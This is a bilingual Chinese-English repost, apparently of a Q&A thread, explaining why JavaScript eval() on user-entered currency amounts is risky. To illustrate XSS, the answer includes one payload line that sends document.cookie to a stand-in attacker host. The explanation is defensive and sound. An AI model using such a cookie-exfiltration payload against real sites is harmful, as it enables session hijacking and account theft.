Javascript eval()是如此危险吗? [英] Is Javascript eval() so dangerous?
问题描述
我正在写一个用户必须以货币金额书写的脚本,一些例子可能是(用户输入>>转换为),美元为默认货币:
I am writing a script in which users have to write in a currency amount, some examples could be (user input >> converts to), with USD as default currency:
50 >> 50.0 USD
50.5 >> 50.5 USD
50+1 USD >> 51.0 USD
50 GBP >> 50.0 GBP
我想让它尽可能顺利,因此我想使用JavaScript(它是一个基于PHP / MySql + JavaScript的web应用程序)。我想使用正则表达式来过滤输入,通过 eval()运行它并返回它。
I want to make this as smooth as possible, therefore I want to use JavaScript (it's a web app based on PHP/MySql + JavaScript). I want to use regex to filter the input, run it through eval() and return it.
这是一个坏主意?我已经阅读了一些关于 eval()作为安全问题的主题。我只是不知道如何。用户可以轻松地运行JavaScript吗?
Is this a bad idea? I've read some topics about eval() being a security issue. I just don't see how. A user can easily run JavaScript anyway?
请记住,我将在稍后阶段使用PHP验证所有输入服务器端。
Keep in mind that I will validate all input server-side with PHP at a later stage.
推荐答案
你是对的,终端用户无论如何都可以通过浏览器的开发者控制台轻松执行任意JavaScript(我一直这样做)。您需要担心的是攻击者为了自己的目的而劫持您使用 eval 的功能。
You're right that an end user can easily execute arbitrary JavaScript anyway via the browser's developer console (I do this all the time). What you have to worry about is an attacker hijacking your feature that uses eval for his own ends.
原因 eval 通常被认为是危险的,因为非常很容易让不受信任的代码潜入。考虑允许您通过查询字符串指定输入的页面,其中输入框预先填充了查询字符串中的值。
The reason eval is generally considered dangerous is because it is very easy for untrusted code to sneak in. Consider a page that allows you specify input via query string, where the input box is prepopulated with the value in the query string.
攻击者可以传播包含窃取用户登录cookie的代码的链接:
An attacker could spread a link that contains code which steals a user's login cookie:
/some/url?amount=var i=new Image();i.src='http://badguy.ru/x?' + document.cookie;
(显然需要正确的URL编码;这只是为了说明。)
(Obviously proper URL encoding is required; this is for illustration.)
或者,当验证失败时,您的PHP脚本echos可能会将数据发回到您的表单中。攻击者可以创建一个特制的表单,使用相同的cookie窃取代码发布到您的表单。
Or, perhaps your PHP script echos posted data back into your form when validation fails. An attacker could create a specially crafted form that posts to your form with the same cookie-stealing code.
使用
Each of these attacks can be mitigated by using httpOnly cookies (to prevent stolen login cookies) or making sure that data is sanitized – but the point is this isn't even close to an exhaustive list of how things can go wrong. For example, an injected script could still insert 1000 in the amount field and try to transfer that amount to the attacker's account (if this is a money transfer page).
Even鉴于您正在使用正则表达式来清理输入并不一定能保护您:可以编写任意JavaScript 完全带括号!
Even given the fact that you're using a regex to sanitize input doesn't necessarily protect you: it's possible to write arbitrary JavaScript entirely with brackets!
所以最重要的是,如果你可以绝对确定输入进入文本字段的唯一方法是通过用户输入,你很好:用户没有通过控制台获得任何他们无法做到的事情。但是,如果攻击者能够以某种方式将自己的数据放入该字段, eval ,则可能会使您遇到漏洞。
So the bottom line is that if you can make absolutely sure that the only way input makes its way into your text field is via user input, you're fine: the user hasn't gained anything they wouldn't be able to do otherwise via the console. However, if an attacker can somehow get their own data into that field, evaling it may expose you to a vulnerability.
参见:
- JavaScript to evaluate simple math string like 5*1.2 (eval/white-list?)
- JavaScript written only with brackets?
这篇关于Javascript eval()是如此危险吗?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
